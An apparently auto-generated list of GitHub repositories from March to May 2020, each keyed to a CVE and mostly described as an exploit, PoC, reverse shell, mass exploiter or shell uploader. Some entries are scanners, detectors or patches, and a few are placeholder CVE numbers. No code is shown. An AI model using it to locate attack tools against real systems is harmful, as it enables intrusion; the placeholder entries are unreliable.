**Weblogic coherence.jar RCE** : [Y4er/CVE-2020-2883](https://github.com/Y4er/CVE-2020-2883) create time: 2020-05-10T09:04:43Z

**no description** : [BBRathnayaka/POC-CVE-2019-5736](https://github.com/BBRathnayaka/POC-CVE-2019-5736) create time: 2020-05-10T04:49:28Z

**A Python script to exploit CVE-2020-8816, a remote code execution vulnerability on the Pi-hole** : [AndreyRainchik/CVE-2020-8816](https://github.com/AndreyRainchik/CVE-2020-8816) create time: 2020-05-10T01:12:28Z

**PoC for CVE-2020-11651** : [RakhithJK/CVE-2020-11651](https://github.com/RakhithJK/CVE-2020-11651) create time: 2020-05-09T11:22:25Z

**Proof of concept code to exploit CVE-2020-12116: Unauthenticated arbitrary file read on ManageEngine OpManger.** : [BeetleChunks/CVE-2020-12116](https://github.com/BeetleChunks/CVE-2020-12116) create time: 2020-05-08T15:56:26Z

**PoC CVE-2017-5123 - LPE - Bypassing SMEP/SMAP. No KASLR** : [c3r34lk1ll3r/CVE-2017-5123](https://github.com/c3r34lk1ll3r/CVE-2017-5123) create time: 2020-05-08T15:10:38Z

**citrix adc rce** : [5l1v3r1/Citrix_CVE-2019-19781](https://github.com/5l1v3r1/Citrix_CVE-2019-19781) create time: 2020-05-08T12:32:05Z

**Project with sublist3r, massan, CVE-2018-15473, ssh bruteforce, ftp bruteforce and nikto.** : [Moon1705/easy_security](https://github.com/Moon1705/easy_security) create time: 2020-05-08T10:29:00Z

**利用微信推送CVE-2020** : [weixiao9188/wechat_push](https://github.com/weixiao9188/wechat_push) create time: 2020-05-08T09:09:56Z

**This is an exploit for CVE-2020-0674 that runs on the x64 version of IE 8, 9, 10, and 11 on Windows 7.** : [maxpl0it/CVE-2020-0674-Exploit](https://github.com/maxpl0it/CVE-2020-0674-Exploit) create time: 2020-05-07T22:02:25Z

**Stored Cross Site Scripting - Iframe Plugin - WordPress** : [g-rubert/CVE-2020-12696](https://github.com/g-rubert/CVE-2020-12696) create time: 2020-05-07T15:16:39Z

**CVE-2020-11651&&CVE-2020-11652 EXP** : [heikanet/CVE-2020-11651-CVE-2020-11652-EXP](https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP) create time: 2020-05-07T09:17:39Z

**CVE-2018-18649 EXP** : [Snowming04/CVE-2018-18649](https://github.com/Snowming04/CVE-2018-18649) create time: 2020-05-07T07:37:34Z

**no description** : [lovelyjuice/cve-2020-11651-exp-plus](https://github.com/lovelyjuice/cve-2020-11651-exp-plus) create time: 2020-05-07T04:41:25Z

**no description** : [Silence-Rain/14-828_Exploitation_of_CVE-2019-5822](https://github.com/Silence-Rain/14-828_Exploitation_of_CVE-2019-5822) create time: 2020-05-06T09:05:23Z

**This repository provides a dockerized infrastructure and a python implementation of the CVE-2019-11043 exploit.** : [kriskhub/CVE-2019-11043](https://github.com/kriskhub/CVE-2019-11043) create time: 2020-05-05T09:43:44Z

**I have discovered a vulnerability in OpenTouch Multimedia Services, making it possible for an attacker with administration rights to execute code on the server via web requests with high privileges.** : [w4cky/CVE-2020-11794](https://github.com/w4cky/CVE-2020-11794) create time: 2020-05-05T09:39:55Z

**no description** : [Sentinel-One/CVE-2020-9332](https://github.com/Sentinel-One/CVE-2020-9332) create time: 2020-05-05T08:06:05Z

**PoC of Backend HTTP Socket Poisoning, via HTTP Smuggling, presented in CVE-2019-15605** : [jlcarruda/node-poc-http-smuggling](https://github.com/jlcarruda/node-poc-http-smuggling) create time: 2020-05-04T23:11:28Z

**PoC for CVE-2020-11651** : [kevthehermit/CVE-2020-11651](https://github.com/kevthehermit/CVE-2020-11651) create time: 2020-05-04T20:34:04Z

**POC code for CVE-2020-3153 - Cisco anyconnect path traversal vulnerability** : [shubham0d/CVE-2020-3153](https://github.com/shubham0d/CVE-2020-3153) create time: 2020-05-04T18:36:22Z

**CVE-2020-11651&&CVE-2020-11652 EXP** : [bravery9/SaltStack-Exp](https://github.com/bravery9/SaltStack-Exp) create time: 2020-05-04T15:07:11Z

**osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting** : [mkelepce/CVE-2020-12629](https://github.com/mkelepce/CVE-2020-12629) create time: 2020-05-04T14:37:51Z

**CVE-2020-11651&&CVE-2020-11652 EXP** : [Imanfeng/SaltStack-Exp](https://github.com/Imanfeng/SaltStack-Exp) create time: 2020-05-04T14:21:58Z

**PoC exploit of CVE-2020-11651 and CVE-2020-11652** : [jasperla/CVE-2020-11651-poc](https://github.com/jasperla/CVE-2020-11651-poc) create time: 2020-05-04T11:52:28Z

**CVE-2020-11651: Proof of Concept** : [0xc0d/CVE-2020-11651](https://github.com/0xc0d/CVE-2020-11651) create time: 2020-05-04T11:47:56Z

**no description** : [dozernz/cve-2020-11651](https://github.com/dozernz/cve-2020-11651) create time: 2020-05-04T08:01:37Z

**estudo da CVE-2018-10678** : [hbranco/CVE-2018-10678](https://github.com/hbranco/CVE-2018-10678) create time: 2020-05-03T22:56:32Z

**Exploit for "GitLab Instance" Arbitrary server file read vulnerability** : [KooroshRZ/CVE-2020-10977](https://github.com/KooroshRZ/CVE-2020-10977) create time: 2020-05-02T10:03:31Z

**no description** : [sumedhaDharmasena/-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272](https://github.com/sumedhaDharmasena/-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272) create time: 2020-05-02T05:41:54Z

**no description** : [Billith/CVE-2019-5736-PoC](https://github.com/Billith/CVE-2019-5736-PoC) create time: 2020-05-01T21:07:42Z

**Salt security backports for CVE-2020-11651 & CVE-2020-11652** : [rossengeorgiev/salt-security-backports](https://github.com/rossengeorgiev/salt-security-backports) create time: 2020-05-01T20:53:49Z

**This is a recurrence of cve-2019-9787 on Wordpress and a hash-based defense.** : [sijiahi/Wordpress_cve-2019-9787_defense](https://github.com/sijiahi/Wordpress_cve-2019-9787_defense) create time: 2020-05-01T13:44:10Z

**Checks for CVE-2020-11651 and CVE-2020-11652** : [chef-cft/salt-vulnerabilities](https://github.com/chef-cft/salt-vulnerabilities) create time: 2020-05-01T03:23:01Z

**CVE-2020-12688 - Authenticated RCE Centreon 20.04** : [TheCyberGeek/Centreon-20.04](https://github.com/TheCyberGeek/Centreon-20.04) create time: 2020-04-30T21:59:52Z

**no description** : [tdcoming/CVE-2020-88888](https://github.com/tdcoming/CVE-2020-88888) create time: 2020-04-30T15:12:03Z

**no description** : [tdcoming/CVE-2020-99999999](https://github.com/tdcoming/CVE-2020-99999999) create time: 2020-04-30T10:29:08Z

**no description** : [tdcoming/CVE-2020-98989](https://github.com/tdcoming/CVE-2020-98989) create time: 2020-04-30T08:03:38Z

**no description** : [tdcoming/CVE-2020-9999](https://github.com/tdcoming/CVE-2020-9999) create time: 2020-04-30T07:40:15Z

**no description** : [coblax/CVE-2018-6574](https://github.com/coblax/CVE-2018-6574) create time: 2020-04-29T07:08:13Z

**no description** : [yukar1z0e/CVE-2018-14847](https://github.com/yukar1z0e/CVE-2018-14847) create time: 2020-04-29T01:40:33Z

**Proof of concept exploit about OpenSSL signature_algorithms_cert DoS flaw (CVE-2020-1967)** : [irsl/CVE-2020-1967](https://github.com/irsl/CVE-2020-1967) create time: 2020-04-28T21:15:35Z

**The official exploit for Open-AudIT v3.3.1 Remote Code Execution CVE-2020-12078** : [mhaskar/CVE-2020-12078](https://github.com/mhaskar/CVE-2020-12078) create time: 2020-04-28T13:48:27Z

**Centreon Monitoring Software Images that are vulnerable to CVE 2019-19699 and more.** : [SpengeSec/Centreon-Vulnerable-Images](https://github.com/SpengeSec/Centreon-Vulnerable-Images) create time: 2020-04-28T09:46:57Z

**CVE-2018-15133 (Webased)** : [iansangaji/laravel-rce-cve-2018-15133](https://github.com/iansangaji/laravel-rce-cve-2018-15133) create time: 2020-04-27T16:12:27Z

**Hikvision camera CVE-2017-7921-EXP** : [JrDw0/CVE-2017-7921-EXP](https://github.com/JrDw0/CVE-2017-7921-EXP) create time: 2020-04-27T11:49:40Z

**no description** : [wcxxxxx/CVE-2020-7961](https://github.com/wcxxxxx/CVE-2020-7961) create time: 2020-04-27T04:27:51Z

**no description** : [waleweewe12/CVE-2020-8417](https://github.com/waleweewe12/CVE-2020-8417) create time: 2020-04-27T00:41:39Z

**no description** : [asc0t6e/cVe-2020-12345](https://github.com/asc0t6e/cVe-2020-12345) create time: 2020-04-26T14:25:40Z

**no description** : [asc0t6e/Cve-20201-1234](https://github.com/asc0t6e/Cve-20201-1234) create time: 2020-04-26T14:24:00Z

**no description** : [asc0t6e/cve-2020-test](https://github.com/asc0t6e/cve-2020-test) create time: 2020-04-26T14:23:16Z

**no description** : [snappyJack/CVE-2019-8936](https://github.com/snappyJack/CVE-2019-8936) create time: 2020-04-26T11:07:19Z

**no description** : [zhang192073/cve-2020-test](https://github.com/zhang192073/cve-2020-test) create time: 2020-04-26T09:42:49Z

**WordPress CVE-2017-5487 Exploit in Python** : [patilkr/wp-CVE-2017-5487-exploit](https://github.com/patilkr/wp-CVE-2017-5487-exploit) create time: 2020-04-26T08:17:41Z

**android-kernel-exploitation-ashfaq-CVE-2019-2215 docker setup for mac users** : [qre0ct/android-kernel-exploitation-ashfaq-CVE-2019-2215](https://github.com/qre0ct/android-kernel-exploitation-ashfaq-CVE-2019-2215) create time: 2020-04-25T07:31:35Z

**POC CVE-2018-14714** : [tin-z/CVE-2018-14714-POC](https://github.com/tin-z/CVE-2018-14714-POC) create time: 2020-04-25T03:43:44Z

**nvr漏洞** : [g5q2/cve-2018-9995](https://github.com/g5q2/cve-2018-9995) create time: 2020-04-24T08:32:28Z

**no description** : [JJSO12/Apache-Pluto-3.0.0--CVE-2018-1306](https://github.com/JJSO12/Apache-Pluto-3.0.0--CVE-2018-1306) create time: 2020-04-24T06:34:55Z

**no description** : [limkokhole/GHOSTCHECK-cve-2015-0235](https://github.com/limkokhole/GHOSTCHECK-cve-2015-0235) create time: 2020-04-23T22:26:31Z

**BigBlueButton versions lower than 2.2.4 have a LFI vulnerability allowing access to sensitive files. 🚨** : [tchenu/CVE-2020-12112](https://github.com/tchenu/CVE-2020-12112) create time: 2020-04-23T18:50:23Z

**Whatsapp Automatic Payload Generator [CVE-2019-11932]** : [Err0r-ICA/WhatsPayloadRCE](https://github.com/Err0r-ICA/WhatsPayloadRCE) create time: 2020-04-22T21:11:27Z

**no description** : [section-c/CVE-2020-6888](https://github.com/section-c/CVE-2020-6888) create time: 2020-04-22T15:38:18Z

**no description** : [section-c/CVE-2020-0796](https://github.com/section-c/CVE-2020-0796) create time: 2020-04-22T15:33:49Z

**no description** : [snappyJack/pdfresurrect_CVE-2019-14267](https://github.com/snappyJack/pdfresurrect_CVE-2019-14267) create time: 2020-04-22T14:46:57Z

**no description** : [section-c/CVE-2020-2333](https://github.com/section-c/CVE-2020-2333) create time: 2020-04-22T13:44:30Z

**win32k use-after-free poc** : [james0x40/CVE-2020-0624](https://github.com/james0x40/CVE-2020-0624) create time: 2020-04-22T13:11:16Z

**no description** : [3x1t1um/CVE-2007-2447](https://github.com/3x1t1um/CVE-2007-2447) create time: 2020-04-22T11:47:16Z

**no description** : [syadg123/CVE-2020-0883](https://github.com/syadg123/CVE-2020-0883) create time: 2020-04-22T09:10:27Z

**no description** : [syadg123/CVE-2020-0796](https://github.com/syadg123/CVE-2020-0796) create time: 2020-04-22T09:10:15Z

**PoC RCE Reverse Shell for CVE-2020-0796 (SMBGhost)** : [thelostworldFree/CVE-2020-0796](https://github.com/thelostworldFree/CVE-2020-0796) create time: 2020-04-22T09:09:02Z

**PoC RCE Reverse Shell for CVE-2020-0883** : [thelostworldFree/CVE-2020-0883](https://github.com/thelostworldFree/CVE-2020-0883) create time: 2020-04-22T09:08:33Z

**Insecure Java Deserialization Lab** : [Ingenuity-Fainting-Goats/CVE-2017-7525-Jackson-Deserialization-Lab](https://github.com/Ingenuity-Fainting-Goats/CVE-2017-7525-Jackson-Deserialization-Lab) create time: 2020-04-22T07:48:19Z

**PoC RCE Reverse Shell for CVE-2020-0688** : [ktpdpro/CVE-2020-0688](https://github.com/ktpdpro/CVE-2020-0688) create time: 2020-04-22T07:28:32Z

**CVE-2020-11890: Improper input validations in the usergroup table class could lead to a broken ACL configuration to RCE** : [HoangKien1020/CVE-2020-11890](https://github.com/HoangKien1020/CVE-2020-11890) create time: 2020-04-22T06:42:50Z

**Exploit PoC RCE - Windows Hyper-V Remote Code Execution Reverse Shell** : [inetshell/CVE-2020-0910](https://github.com/inetshell/CVE-2020-0910) create time: 2020-04-22T02:07:41Z

**CVE-2004-1769 // Mass cPanel Reset password** : [sinkaroid/shiguresh](https://github.com/sinkaroid/shiguresh) create time: 2020-04-21T22:03:18Z

**CVE-2020-0796 Remote Code Execution POC** : [ZecOps/CVE-2020-0796-RCE-POC](https://github.com/ZecOps/CVE-2020-0796-RCE-POC) create time: 2020-04-20T14:35:48Z

**no description** : [darren646/CVE-2019-19781POC](https://github.com/darren646/CVE-2019-19781POC) create time: 2020-04-20T08:33:34Z

**Exploit for CVE-2020-3952 in vCenter 6.7 https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/** : [Fa1c0n35/vmware_vcenter_cve_2020_3952](https://github.com/Fa1c0n35/vmware_vcenter_cve_2020_3952) create time: 2020-04-19T18:35:13Z

**no description** : [Fa1c0n35/https-github.com-guardicore-vmware_vcenter_cve_2020_3952](https://github.com/Fa1c0n35/https-github.com-guardicore-vmware_vcenter_cve_2020_3952) create time: 2020-04-19T18:32:28Z

**no description** : [kristyna-mlcakova/CVE-2018-10933](https://github.com/kristyna-mlcakova/CVE-2018-10933) create time: 2020-04-19T16:20:19Z

**D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1** : [huzaifahussain98/CVE-2019-17525](https://github.com/huzaifahussain98/CVE-2019-17525) create time: 2020-04-18T06:06:44Z

**Citrix Sharefile vulnerability check and fast research details** : [DimitriNL/CTX-CVE-2020-7473](https://github.com/DimitriNL/CTX-CVE-2020-7473) create time: 2020-04-17T18:48:38Z

**VMWare vmdir missing access control exploit checker** : [gelim/CVE-2020-3952](https://github.com/gelim/CVE-2020-3952) create time: 2020-04-17T12:39:31Z

**Exploit Code for CVE-2020-1283 - Windows-Denial-of-Service-Vulnerability** : [RedyOpsResearchLabs/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability](https://github.com/RedyOpsResearchLabs/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability) create time: 2020-04-17T09:21:36Z

**漏洞环境复现** : [scxiaotan1/Docker](https://github.com/scxiaotan1/Docker) create time: 2020-04-17T02:51:07Z

**This utility can help determine if indicators of compromise (IOCs) exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510.** : [cisagov/check-your-pulse](https://github.com/cisagov/check-your-pulse) create time: 2020-04-16T16:32:47Z

**CVE-2020-5260演示记录** : [sv3nbeast/CVE-2020-5260](https://github.com/sv3nbeast/CVE-2020-5260) create time: 2020-04-16T16:19:23Z

**CVE-2020-10199 Nexus <= 3.21.1 远程代码执行脚本(有回显)** : [zhzyker/CVE-2020-10199_POC-EXP](https://github.com/zhzyker/CVE-2020-10199_POC-EXP) create time: 2020-04-16T09:40:15Z

**CVE-2020-5837 exploit** : [RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write](https://github.com/RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write) create time: 2020-04-16T08:15:18Z

**Exploit for CVE-2020-3952 in vCenter 6.7** : [guardicore/vmware_vcenter_cve_2020_3952](https://github.com/guardicore/vmware_vcenter_cve_2020_3952) create time: 2020-04-16T07:40:51Z

**Working Exploit PoC for VMWare vCenter Server (CVE-2020-3952) - Reverse Bind Shell** : [avboy1337/CVE-2020-3952](https://github.com/avboy1337/CVE-2020-3952) create time: 2020-04-16T01:39:33Z

**https://bugs.chromium.org/p/project-zero/issues/detail?id=2021** : [Asgavar/CVE-2020-5260](https://github.com/Asgavar/CVE-2020-5260) create time: 2020-04-15T11:32:16Z

**NVMS 1000 - Directory Traversal Attack Exploit for CVE-2019-20085** : [AleDiBen/NVMS1000-Exploit](https://github.com/AleDiBen/NVMS1000-Exploit) create time: 2020-04-15T10:31:14Z

**A HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku** : [brompwnie/cve-2020-5260](https://github.com/brompwnie/cve-2020-5260) create time: 2020-04-15T10:16:56Z

**no description** : [mekoko/CVE-2020-4276](https://github.com/mekoko/CVE-2020-4276) create time: 2020-04-15T01:26:55Z

**Vuln Check** : [commandermoon/CVE-2020-3952](https://github.com/commandermoon/CVE-2020-3952) create time: 2020-04-15T00:51:21Z

**https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00338.html** : [hessandrew/CVE-2020-0557_INTEL-SA-00338](https://github.com/hessandrew/CVE-2020-0557_INTEL-SA-00338) create time: 2020-04-14T22:51:34Z

**https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00344.html** : [hessandrew/CVE-2020-0568_INTEL-SA-00344](https://github.com/hessandrew/CVE-2020-0568_INTEL-SA-00344) create time: 2020-04-14T22:50:36Z

**patches for SNYK-JS-JQUERY-565129, SNYK-JS-JQUERY-567880, CVE-2020-1102, CVE-2020-11023, includes the patches for SNYK-JS-JQUERY-174006, CVE-2019-11358, CVE-2019-5428** : [DanielRuf/snyk-js-jquery-565129](https://github.com/DanielRuf/snyk-js-jquery-565129) create time: 2020-04-14T19:12:01Z

**This tool helps scan large subnets for cve-2020-0796 vulnerable systems** : [intelliroot-tech/cve-2020-0796-Scanner](https://github.com/intelliroot-tech/cve-2020-0796-Scanner) create time: 2020-04-14T10:01:05Z

**Reproduction of CSRF breach CVE-2019-1010054** : [chaizeg/CSRF-breach](https://github.com/chaizeg/CSRF-breach) create time: 2020-04-13T20:56:00Z

**Reproduction of privilege escalation breach CVE-2019-3010** : [chaizeg/privilege-escalation-breach](https://github.com/chaizeg/privilege-escalation-breach) create time: 2020-04-13T20:44:02Z

**https://bugs.chromium.org/p/project-zero/issues/detail?id=1820** : [tunnelshade/cve-2019-11707](https://github.com/tunnelshade/cve-2019-11707) create time: 2020-04-13T15:11:46Z

**Exploiting ring0 memcpy-like functionality to disable Driver Signing Enforcement (DSE)** : [ASkyeye/CVE-2018-19320](https://github.com/ASkyeye/CVE-2018-19320) create time: 2020-04-13T11:34:24Z

**CVE-2019-5475-EXP 【Nexus Repository Manager 2.x远程命令执行漏洞】** : [rabbitmask/CVE-2019-5475-EXP](https://github.com/rabbitmask/CVE-2019-5475-EXP) create time: 2020-04-12T15:49:36Z

**CVE-2018-7600【Drupal7】批量扫描工具。** : [rabbitmask/CVE-2018-7600-Drupal7](https://github.com/rabbitmask/CVE-2018-7600-Drupal7) create time: 2020-04-12T07:37:14Z

**CVE-2020-1958 PoC** : [ggolawski/CVE-2020-1958](https://github.com/ggolawski/CVE-2020-1958) create time: 2020-04-11T13:31:02Z

**MacOS kernel memory leak (4 bytes)** : [DimitriFourny/cve-2019-6207](https://github.com/DimitriFourny/cve-2019-6207) create time: 2020-04-10T14:30:16Z

**Code execution for CVE-2017-11176** : [c3r34lk1ll3r/CVE-2017-11176](https://github.com/c3r34lk1ll3r/CVE-2017-11176) create time: 2020-04-10T12:44:05Z

**CVE-2018-12386 - Firefox Sandboxed RCE Exploit for Linux (Firefox <v62.0.3)** : [0xLyte/cve-2018-12386](https://github.com/0xLyte/cve-2018-12386) create time: 2020-04-10T11:59:15Z

**EasyAntiCheat Integrity check bypass by mimicking memory changes** : [thesecretclub/CVEAC-2020](https://github.com/thesecretclub/CVEAC-2020) create time: 2020-04-09T14:53:01Z

**no description** : [weinull/CVE-2020-11650](https://github.com/weinull/CVE-2020-11650) create time: 2020-04-09T06:21:35Z

**This Repository use to test Apache Killer (cve-2011-3192).** : [stcmjp/cve-2011-3192](https://github.com/stcmjp/cve-2011-3192) create time: 2020-04-09T02:03:43Z

**no description** : [Eugene24/CVE-2018-6574](https://github.com/Eugene24/CVE-2018-6574) create time: 2020-04-08T11:33:46Z

**CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面。CVE-2020-10199 and CVE-2020-10204 Vul Tool with GUI.** : [magicming200/CVE-2020-10199_CVE-2020-10204](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204) create time: 2020-04-08T11:08:35Z

**CVE-2020-10199、CVE-2020-10204、CVE-2020-11444** : [jas502n/CVE-2020-10199](https://github.com/jas502n/CVE-2020-10199) create time: 2020-04-08T07:36:30Z

**CVE-2020-10199 CVE-2020-10204 Python POC** : [wsfengfan/CVE-2020-10199-10204](https://github.com/wsfengfan/CVE-2020-10199-10204) create time: 2020-04-07T13:23:12Z

**no description** : [RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP](https://github.com/RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP) create time: 2020-04-07T11:17:27Z

**CVE-2018-7600 Drupal Drupalgeddon 2 远程代码执行漏洞利用脚本** : [zhzyker/CVE-2018-7600-Drupal-POC-EXP](https://github.com/zhzyker/CVE-2018-7600-Drupal-POC-EXP) create time: 2020-04-07T06:54:13Z

**no description** : [klinix5/CVE-2020-0814](https://github.com/klinix5/CVE-2020-0814) create time: 2020-04-07T01:17:32Z

**My journey through WebKit CVE-2016-4622 Exploitation process** : [hdbreaker/WebKit-CVE-2016-4622](https://github.com/hdbreaker/WebKit-CVE-2016-4622) create time: 2020-04-07T00:46:19Z

**Interactive RCE exploit demo for Eclipse CHE** : [codingchili/CVE-2020-14368](https://github.com/codingchili/CVE-2020-14368) create time: 2020-04-06T17:30:11Z

**Cobalt Strike AggressorScripts CVE-2020-0796** : [Rvn0xsy/CVE_2020_0796_CNA](https://github.com/Rvn0xsy/CVE_2020_0796_CNA) create time: 2020-04-06T15:16:10Z

**Use shell to build weblogic debug environment for CVE-2020-2551** : [cnsimo/CVE-2020-2551](https://github.com/cnsimo/CVE-2020-2551) create time: 2020-04-06T10:47:35Z

**CVE-2017-10271** : [testwc/CVE-2017-10271](https://github.com/testwc/CVE-2017-10271) create time: 2020-04-06T02:01:20Z

**Fuel-Cms Rce Exploit (Single,Mass) Version: 1.4.2** : [SalimAlk/CVE-2018-16763-](https://github.com/SalimAlk/CVE-2018-16763-) create time: 2020-04-05T23:13:17Z

**KR00K - CVE-2019-15126** : [mustafasevim/kr00k-vulnerability](https://github.com/mustafasevim/kr00k-vulnerability) create time: 2020-04-05T17:46:41Z

**CVE-2020-1206 Uninitialized Kernel Memory Read POC** : [ZecOps/CVE-2020-1206-POC](https://github.com/ZecOps/CVE-2020-1206-POC) create time: 2020-04-05T15:52:43Z

**CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"** : [mahyarx/Exploit_CVE-2020-0688](https://github.com/mahyarx/Exploit_CVE-2020-0688) create time: 2020-04-05T13:26:03Z

**XAMPP - CVE-2020-11107** : [andripwn/CVE-2020-11107](https://github.com/andripwn/CVE-2020-11107) create time: 2020-04-05T10:45:49Z

**USB device fuzzing on Android Phone** : [parallelbeings/CVE-2019-14079](https://github.com/parallelbeings/CVE-2019-14079) create time: 2020-04-05T05:45:29Z

**Laravel-PHP-Unit-RCE (CVE-2018-15133) Auto Exploiter and Shell Uploader** : [Prabesh01/Laravel-PHP-Unit-RCE-Auto-shell-uploader](https://github.com/Prabesh01/Laravel-PHP-Unit-RCE-Auto-shell-uploader) create time: 2020-04-05T04:54:40Z

**no description** : [VVzv/CVE-2016-3088](https://github.com/VVzv/CVE-2016-3088) create time: 2020-04-04T06:50:28Z

**PoCs for CVE-2020-11108; an RCE and priv esc in Pi-hole** : [Frichetten/CVE-2020-11108-PoC](https://github.com/Frichetten/CVE-2020-11108-PoC) create time: 2020-04-04T00:50:42Z

**This is a writeup for CVE-2020-11107 reported by Maximilian Barz** : [S1lkys/CVE-2020-11107](https://github.com/S1lkys/CVE-2020-11107) create time: 2020-04-03T13:46:25Z

**no description** : [rhbb/CVE-2019-7609](https://github.com/rhbb/CVE-2019-7609) create time: 2020-04-03T10:23:03Z

**no description** : [rhbb/CVE-2019-17671](https://github.com/rhbb/CVE-2019-17671) create time: 2020-04-03T08:29:07Z

**CVE-2020-8103 Link Resolution Privilege Escalation Vulnerability in Bitdefender Antivirus Free** : [RedyOpsResearchLabs/-CVE-2020-8103-Bitdefender-Antivirus-Free-EoP](https://github.com/RedyOpsResearchLabs/-CVE-2020-8103-Bitdefender-Antivirus-Free-EoP) create time: 2020-04-03T07:57:53Z

**no description** : [asc0t6e/CVE-2020-TEST-BOT](https://github.com/asc0t6e/CVE-2020-TEST-BOT) create time: 2020-04-03T02:56:53Z

**CVE-2020-0796-EXP** : [LabDookhtegan/CVE-2020-0796-EXP](https://github.com/LabDookhtegan/CVE-2020-0796-EXP) create time: 2020-04-02T15:32:10Z

**该资源为CVE-2020-0796漏洞复现,包括Python版本和C++版本。主要是集合了github大神们的资源,希望您喜欢~** : [eastmountyxz/CVE-2020-0796-SMB](https://github.com/eastmountyxz/CVE-2020-0796-SMB) create time: 2020-04-02T12:12:03Z

**CVE-2020-????** : [b1ack0wl/Edge0day.exe](https://github.com/b1ack0wl/Edge0day.exe) create time: 2020-04-01T21:22:04Z

**https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3766** : [hessandrew/CVE-2020-3766_APSB20-12](https://github.com/hessandrew/CVE-2020-3766_APSB20-12) create time: 2020-04-01T10:55:31Z

**Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340** : [zhzyker/exphub](https://github.com/zhzyker/exphub) create time: 2020-04-01T09:33:35Z

**no description** : [jiansiting/CVE-2020-0796](https://github.com/jiansiting/CVE-2020-0796) create time: 2020-04-01T01:46:08Z

**Coronablue exploit** : [tango-j/CVE-2020-0796](https://github.com/tango-j/CVE-2020-0796) create time: 2020-03-31T19:01:52Z

**Exploits for Android Binder bug CVE-2020-0041** : [bluefrostsecurity/CVE-2020-0041](https://github.com/bluefrostsecurity/CVE-2020-0041) create time: 2020-03-31T17:53:57Z

**Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"** : [ravinacademy/CVE-2020-0688](https://github.com/ravinacademy/CVE-2020-0688) create time: 2020-03-31T15:29:52Z

**Windows SMBv3 LPE exploit 已编译版** : [f1tz/CVE-2020-0796-LPE-EXP](https://github.com/f1tz/CVE-2020-0796-LPE-EXP) create time: 2020-03-31T11:25:50Z

**SMBGHOST local privilege escalation** : [TinToSer/CVE-2020-0796-LPE](https://github.com/TinToSer/CVE-2020-0796-LPE) create time: 2020-03-31T05:41:30Z

**CVE-2020-0796 Local Privilege Escalation POC** : [ZecOps/CVE-2020-0796-LPE-POC](https://github.com/ZecOps/CVE-2020-0796-LPE-POC) create time: 2020-03-30T16:06:50Z

**CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost** : [danigargu/CVE-2020-0796](https://github.com/danigargu/CVE-2020-0796) create time: 2020-03-30T11:42:56Z

**Exploit for the CVE-2019-16278 vulnerability** : [keshiba/cve-2019-16278](https://github.com/keshiba/cve-2019-16278) create time: 2020-03-30T08:54:06Z

**从老外那里下载了该漏洞的修复工程,无奈依赖包实在是太多下不下来,选取其中axis工程打成jar包后发现已成功修复项目的漏洞,有需要的亲可以下载重新打jar包替换即可。 clone后用idea打axis这个jar包即可** : [cairuojin/CVE-2018-8032](https://github.com/cairuojin/CVE-2018-8032) create time: 2020-03-30T06:31:49Z

**no description** : [tripledd/cve-2020-0796-vuln](https://github.com/tripledd/cve-2020-0796-vuln) create time: 2020-03-30T05:13:16Z

**CVE-2020-8515-PoC** : [imjdl/CVE-2020-8515-PoC](https://github.com/imjdl/CVE-2020-8515-PoC) create time: 2020-03-30T03:31:26Z

**CVE-2020-10560 OSSN Arbitrary File Read** : [kevthehermit/CVE-2020-10560](https://github.com/kevthehermit/CVE-2020-10560) create time: 2020-03-28T22:09:39Z

**Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32)** : [ivanitlearning/CVE-2004-1561](https://github.com/ivanitlearning/CVE-2004-1561) create time: 2020-03-27T16:30:22Z

**CVE-2020-1938 / CNVD-2020-1048 Detection Tools** : [doggycheng/CNVD-2020-10487](https://github.com/doggycheng/CNVD-2020-10487) create time: 2020-03-27T08:33:28Z

**no description** : [ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure](https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure) create time: 2020-03-26T23:14:55Z

**CVE 2018-16763** : [dinhbaouit/CVE-2018-16763](https://github.com/dinhbaouit/CVE-2018-16763) create time: 2020-03-26T09:38:16Z

**An attack exploiting CVE 2007-0038 on Windows XP Pro x64 Edition SP1** : [Cheesse/cve2007-0038x64](https://github.com/Cheesse/cve2007-0038x64) create time: 2020-03-26T03:04:58Z

**no description** : [mzer0one/CVE-2020-7961-POC](https://github.com/mzer0one/CVE-2020-7961-POC) create time: 2020-03-26T01:34:38Z

**TP-Link Archer C50 V3 devices before Build 200318 Rel. 62209 allows remote attackers to cause a denial of service via a crafted HTTP Header containing an unexpected Referer field.** : [thewhiteh4t/cve-2020-9375](https://github.com/thewhiteh4t/cve-2020-9375) create time: 2020-03-25T18:18:15Z

**A check for GHOST; cve-2015-0235** : [chayim/GHOSTCHECK-cve-2015-0235](https://github.com/chayim/GHOSTCHECK-cve-2015-0235) create time: 2020-03-24T15:03:09Z

